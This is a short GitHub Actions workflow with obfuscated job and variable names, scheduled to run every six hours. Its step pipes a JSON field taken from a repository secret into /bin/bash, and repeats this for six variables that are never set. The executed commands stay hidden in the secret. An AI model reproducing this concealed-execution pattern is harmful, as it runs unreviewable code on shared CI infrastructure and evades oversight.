name: yuanjiaming9876

on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuanjiaming9876
        env:
          de513: ${{ secrets.de513 }}
        run: |
          echo $de513 | jq -r .eokpi2 | /bin/bash
          echo $gzqp5252 | jq -r .gdmtb88 | /bin/bash
          echo $p196 | jq -r .jift0 | /bin/bash
          echo $nhviv1 | jq -r .bpty27 | /bin/bash
          echo $ptay05 | jq -r .hkwkw214 | /bin/bash
          echo $ymjl5 | jq -r .c946 | /bin/bash
          echo $fbxu122 | jq -r .hmbsb2396 | /bin/bash

